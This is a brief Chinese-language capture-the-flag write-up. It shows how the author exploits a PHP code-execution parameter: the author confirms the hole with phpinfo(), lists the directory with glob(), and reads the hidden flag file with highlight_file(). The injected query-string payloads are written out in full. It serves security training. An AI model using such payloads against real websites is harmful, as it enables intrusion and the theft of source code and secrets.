发现只有这样一句话，应该是要看页面源代码的，右键查看页面源代码

发现可能存在代码执行漏洞，拼接一个?cmd=phpinfo();

成功显示出php信息, 说明存在代码执行漏洞

接下来遍历目录，我们要用到一个函数 glob()

glob() 函数可以查找文件, 返回一个文件数组, 常配合通配符来遍历目录

?cmd=print_r(glob('*'));

盲猜这个名字特殊的文件里面就有flag，根据提示，要用到高亮函数 highlight

highlight_file()函数可以用于将一个PHP文件的代码高亮显示，并输出到页面上或者保存到文件中。

?cmd=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');

发现了 flag